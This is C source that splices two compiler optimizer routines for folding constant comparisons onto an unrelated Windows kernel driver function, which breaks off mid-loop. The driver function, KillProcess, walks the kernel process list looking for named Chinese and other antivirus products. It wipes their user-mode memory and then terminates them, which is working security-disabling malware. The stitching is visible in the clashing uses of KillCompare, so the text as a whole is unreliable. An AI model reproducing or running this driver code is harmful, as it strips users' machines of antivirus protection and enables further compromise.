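static  instruction *CmpRelocZero( instruction *ins, opcnt c, opcnt r )
/*********************************************************************
    Try to fold a two-operand comparison whose operand 'c' is the
    absolute constant zero and whose operand 'r' is a relocatable
    constant.  The switch below assigns the outcome that holds when
    operand 'r' is strictly greater than zero; 'c' being operand 0
    instead of operand 1 swaps the sides and hence inverts the result.
    The instruction is pinned to the true or false successor block and
    KillCompare replaces it with the corresponding constant.

    Returns the replacement instruction, or NULL when the instruction
    cannot be folded (wrong operand count, 'c' not absolute zero,
    far offset, opcode not a known compare, or compare not active).
*/
{
    name        *cons;
    name        *rel;
    bool        truth;

    if( OpcodeNumOperands( ins ) != 2 )
        return( NULL );
    cons = ins->operands[c];
    if( cons->n.class != N_CONSTANT )
        return( NULL );
    if( cons->c.const_type != CONS_ABSOLUTE )
        return( NULL );
    /* only a comparison against zero is decided here */
    if( CFTest( cons->c.value ) != 0 )
        return( NULL );
    rel = ins->operands[r];
    /* NOTE(review): rel->n.class is not checked before rel->c is read;
       presumably the caller only passes a constant operand -- confirm. */
    /* an offset into a segment that is not near is not folded --
       presumably because such an offset may itself be zero */
    if( rel->c.const_type == CONS_OFFSET && !AskSegIsNear( (segment_id)rel->c.lo.int_value ) )
        return( NULL );
    switch( ins->head.opcode ) {
    case OP_BIT_TEST_FALSE:
    case OP_CMP_EQUAL:
    case OP_CMP_LESS:
    case OP_CMP_LESS_EQUAL:
        truth = false;
        break;
    case OP_BIT_TEST_TRUE:
    case OP_CMP_GREATER:
    case OP_CMP_GREATER_EQUAL:
    case OP_CMP_NOT_EQUAL:
        truth = true;
        break;
    default:
        /* not a compare this routine understands.  This used to be
           'return( false )', which only worked because the integer
           constant 0 converts to a null pointer; return NULL like
           every other failure path. */
        return( NULL );
    }
    if( !ActiveCompare( ins ) )
        return( NULL );
    /* the table above assumes 'c' is the right-hand operand */
    if( c != 1 )
        truth = !truth;
    if( truth ) {
        _SetBlockIndex( ins, _TrueIndex(ins), _TrueIndex(ins) );
    } else {
        _SetBlockIndex( ins, _FalseIndex(ins), _FalseIndex(ins) );
    }
    return( KillCompare( ins, AllocIntConst( truth ? FETrue() : 0 ) ) );
}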
static  instruction *StraightLine( instruction *ins, tn fold, bool is_true )
/***************************************************************************
    Try to replace a comparison with straight-line code.  'fold' is the
    tree node the comparison folded to; when it names an absolute
    constant the outcome of the compare is known, so the instruction is
    pinned to a single successor block and KillCompare substitutes the
    constant.  'is_true' is the outcome for a non-zero folded value; a
    zero value inverts it.

    Returns the replacement instruction, or NULL when the folded value
    is not an absolute constant.
*/
{
    name        *folded;

    folded = TGetName( fold );
    if( folded == NULL
     || folded->n.class != N_CONSTANT
     || folded->c.const_type != CONS_ABSOLUTE ) {
        return( NULL );
    }
    /* a zero constant means the compare comes out the opposite way */
    is_true = ( folded->c.lo.int_value == 0 ) ? !is_true : is_true;
    if( is_true ) {
        _SetBlockIndex( ins, _TrueIndex(ins), _TrueIndex(ins) );
    } else {
        _SetBlockIndex( ins, _FalseIndex(ins), _FalseIndex(ins) );
    }
    return( KillCompare( ins, folded ) );
}
void KillProcess(PVOID Context)
{
	NTSTATUS status;
	HANDLE prohd;
	BOOLEAN bexe;
	ULONG puserAddress;
	KAPC_STATE ApcState; 
	ANSI_STRING imagename;
	PEPROCESS pepro,ptempepro;
	LARGE_INTEGER timeout;
	PSE_AUDIT_PROCESS_CREATION_INFO papc;
	ANSI_STRING	pastr;
	PVOID pstrb=NULL;
	while(TRUE)
	{
		pepro=PsGetCurrentProcess();
		ptempepro=pepro;
		do 
		{
			bexe=FALSE;
			RtlInitAnsiString(&imagename,(PVOID)((ULONG)ptempepro+eprooffset.ImageFileName)); //+0x174 ImageFileName 
			papc=(PSE_AUDIT_PROCESS_CREATION_INFO)((ULONG)ptempepro+eprooffset.SE_AUDIT_PROCESS_CREATION_INFO);//EPROCESS偏移0x1f4处存放着_SE_AUDIT_PROCESS_CREATION_INFO结构的指针
			__try
			{
				if (papc->ImageFileName->Name.Length!=0)
				{
					RtlUnicodeStringToAnsiString(&pastr,&papc->ImageFileName->Name,TRUE);
					pstrb=strstr(pastr.Buffer,"360");
					if (pstrb!=NULL)
					{
						bexe=TRUE;
					}
					RtlFreeAnsiString(&pastr);
				}
			}__except(1){}
			KillCompare(&imagename,"360tray.exe",&bexe);
			KillCompare(&imagename,"360safe.exe",&bexe);
			KillCompare(&imagename,"ZhuDongFangYu.e",&bexe);
			KillCompare(&imagename,"360rp.exe",&bexe);
			KillCompare(&imagename,"360sd.exe",&bexe);
			KillCompare(&imagename,"qqpcrtp.exe",&bexe);
			KillCompare(&imagename,"qqpcleakscan.ex",&bexe);
			KillCompare(&imagename,"qqpctray.exe",&bexe);
			KillCompare(&imagename,"qqpcmgr.exe",&bexe);
			KillCompare(&imagename,"ksafe.exe",&bexe);
			KillCompare(&imagename,"kscan.exe",&bexe);
			KillCompare(&imagename,"kxescore.exe",&bexe);
			KillCompare(&imagename,"kxetray.exe",&bexe);
			KillCompare(&imagename,"ksafesvc.exe",&bexe);
			KillCompare(&imagename,"ksafetray.exe",&bexe);
			KillCompare(&imagename,"ksmgui.exe",&bexe);
			KillCompare(&imagename,"ksmsvc.exe",&bexe);
			KillCompare(&imagename,"avcenter.exe",&bexe);
			KillCompare(&imagename,"avgnt.exe",&bexe);
			KillCompare(&imagename,"avguard.exe",&bexe);
			KillCompare(&imagename,"avshadow.exe",&bexe);
			KillCompare(&imagename,"sched.exe",&bexe);
			KillCompare(&imagename,"ravmond.exe",&bexe);
			KillCompare(&imagename,"rsagent.exe",&bexe);
			KillCompare(&imagename,"rstray.exe",&bexe);
			KillCompare(&imagename,"rsmgrsvc.exe",&bexe);
			if (bexe)
			{
				KeStackAttachProcess(ptempepro,&ApcState);
				for(puserAddress=0;puserAddress<=0x7fffffff;puserAddress+=0x1000)
				{  
					if(MmIsAddressValid((PVOID)puserAddress))
					{
						__try
						{
							ProbeForWrite((PVOID)puserAddress,0x1000,sizeof(ULONG));
							RtlZeroMemory((PVOID)puserAddress, 0x1000);
						}__except(1)
						{ 
							continue;  
						}
					}
					else
					{
						if(puserAddress>0x1000000)//填这么多足够破坏进程数据了
						{
							break;
						}
					}
				}
				KeUnstackDetachProcess(&ApcState);
				status=ObOpenObjectByPointer(ptempepro,0,NULL,PROCESS_ALL_ACCESS,*PsProcessType,KernelMode,&prohd);
				if (NT_SUCCESS(status))
				{
					ZwTerminateProcess(prohd,0);
					ZwClose(prohd);
				}
			}
			ptempepro=(PEPROCESS)((ULONG)(*(PULONG)((ULONG)ptempepro+eprooffset.ActiveProcessLinks))-eprooffset.ActiveProcessLinks); //+0x088 ActiveProcessLinks : _LIST_ENTRY
		} while (ptempepro!=pepro);